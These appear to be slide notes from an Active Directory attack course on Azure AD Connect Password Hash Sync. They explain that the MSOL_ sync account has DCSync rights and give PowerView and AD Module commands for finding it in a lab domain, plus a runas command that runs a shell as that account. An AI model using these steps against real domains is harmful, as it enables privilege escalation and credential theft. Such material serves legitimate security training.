- Azure AD is a popular method to extend identity management from onpremises AD to Microsoft's Azure offerings.
- Many enterprises use their on-prem AD identities to access Azure applications.
- "A single user identity for authentication and authorization to all resources, regardless of location…is hybrid identity."
- An on-premises AD can be integrated with Azure AD using Azure AD Connect with the following methods:
- Password Hash Sync (PHS)
- Pass-Through Authentication (PTA)
- Federation
- Azure AD Connect is installed on-premises and has a high privilege account both in on AD and Azure AD!
- Let's target PHS.
- It shares users and their password hashes from onpremises AD to Azure AD.
- A new users MSOL_ is created which has Synchronization rights (DCSync) on the domain!
- Enumerate the PHS account and server where AD Connect is installed.
Using PowerView
Get-DomainUser -Identity "MSOL_*" -Domain techcorp.local

AD Module
Get-ADUser -Filter "samAccountName -like 'MSOL_*'" -Server techcorp.local -Properties * | select SamAccountName,Description | fl

ADConnect

- With the password, we can run commands as MSOL_
runas /user:techcorp.local\MSOL_16fb75d0227d cmd.exe